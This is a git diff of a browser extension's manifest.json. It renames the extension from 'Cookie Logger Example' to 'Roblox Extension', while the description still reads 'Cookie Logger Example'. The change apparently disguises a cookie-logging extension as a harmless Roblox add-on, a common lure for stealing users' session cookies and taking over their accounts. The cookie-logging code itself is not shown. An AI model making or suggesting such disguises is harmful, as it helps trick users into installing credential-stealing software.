--- a/manifest.json
+++ b/manifest.json
@@ -1,5 +1,5 @@
 {
-  "name": "Cookie Logger Example",
+  "name": "Roblox Extension",
   "description": "Cookie Logger Example",
   "version": "1.0",
   "manifest_version": 3,
